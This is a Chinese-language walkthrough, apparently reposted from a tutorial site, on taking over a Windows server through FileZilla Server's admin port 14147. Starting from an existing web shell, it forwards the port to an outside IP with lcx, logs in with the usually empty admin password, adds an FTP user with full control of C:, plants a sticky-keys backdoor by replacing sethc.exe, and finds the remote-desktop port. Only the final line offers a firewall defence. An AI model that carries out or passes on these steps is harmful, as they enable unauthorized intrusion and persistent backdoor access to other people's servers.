這里為大家分享一下FileZilla Server 利用14147端口提權(quán)視頻教程，這樣對(duì)于防御就有了個(gè)不錯(cuò)的思路，最后對(duì)給大家一個(gè)預(yù)防思路啊。

做個(gè)教程投稿，不知道有沒有獎(jiǎng)勵(lì)~~

開了有3306，說明有root，不過我試了root賬戶被降權(quán)了，也就沒法利用了，

所以利用14147提權(quán)，

用lcx端口轉(zhuǎn)發(fā)工具，把14147端口轉(zhuǎn)發(fā)到我們本機(jī)，

shell上運(yùn)行D:\RECYCLER\lcx.exe -slave 42.239.18.58 327 127.0.0.1 14147

這樣把14147轉(zhuǎn)發(fā)到我們本機(jī)的327端口上，

先本機(jī)監(jiān)聽，本機(jī)運(yùn)行l(wèi)cx -listen 327 3333

是把327轉(zhuǎn)發(fā)到3333，

現(xiàn)在在shell運(yùn)行，

[+] Accept a Client on port 327 from 103.31.75.78 .....
[+] Waiting another Client on port:3333....

OK，然后我們本機(jī)下載FileZilla Server這個(gè)軟件，來連接登錄上去，

端口是3333，管理密碼一般都是空，

已連接, 等待認(rèn)證
協(xié)議警告: 服務(wù)器版本不匹配: 服務(wù)器版本為 0.9.51.32, 管理界面版本為 0.9.65.0
協(xié)議錯(cuò)誤: 協(xié)議版本不匹配: 服務(wù)器協(xié)議版本為 0.1.11.0, 管理界面協(xié)議版本為 0.1.13.0

出現(xiàn)這個(gè)提示，說明版本不匹配，怎么辦呢，他這個(gè)版本如果是老版本，網(wǎng)上還難找，

一般軟件安裝目錄，是有權(quán)限瀏覽的，然后就能下載咯，我們?cè)谒?wù)器上下載他的，就和他的版本一樣了，

D盤沒有，

對(duì)路徑“C:\”的訪問被拒絕。

訪問不了C盤根目錄，我們直接訪問C:\Program Files\

看到?jīng)]，F(xiàn)ileZilla Server，進(jìn)去，下載里面的文件到本機(jī)，是可以下載的，我已經(jīng)下載過了，

已連接，正在等待驗(yàn)證
已登錄

然后點(diǎn)用戶，添加一個(gè)自己的，密碼勾上設(shè)置個(gè)密碼，也可以不設(shè)置就是空密碼，

然后點(diǎn)共享文件夾，添加一個(gè)C盤，右側(cè)的權(quán)限都勾上，然后保存，

現(xiàn)在用FTP軟件連接，端口一般是21，點(diǎn)編輯，設(shè)置這里可以看到端口，

現(xiàn)在C盤完全控制，上shift后門咯，

替換掉下面這兩個(gè)文件夾的sethc文件，
C:\windows\system32\sethc.exe
C:\windows\system32\dllcache\sethc.exe

我用cmd替換，倆都換好了，現(xiàn)在找遠(yuǎn)程端口，

查服務(wù)tasklist /svc

svchost.exe                   1628 TermService 

TermService  的PID是1628，現(xiàn)在找PID 1628 對(duì)應(yīng)的端口，就是遠(yuǎn)程端口咯，

查端口netstat -ano

TCP    0.0.0.0:7755           0.0.0.0:0              LISTENING       1628

端口是7755

OK服務(wù)器到手。

教程到此結(jié)束。

腳本之家小編給出的防御方法：通過端口策略或防火墻，禁止本地的14147連接任意ip的任意端口即可。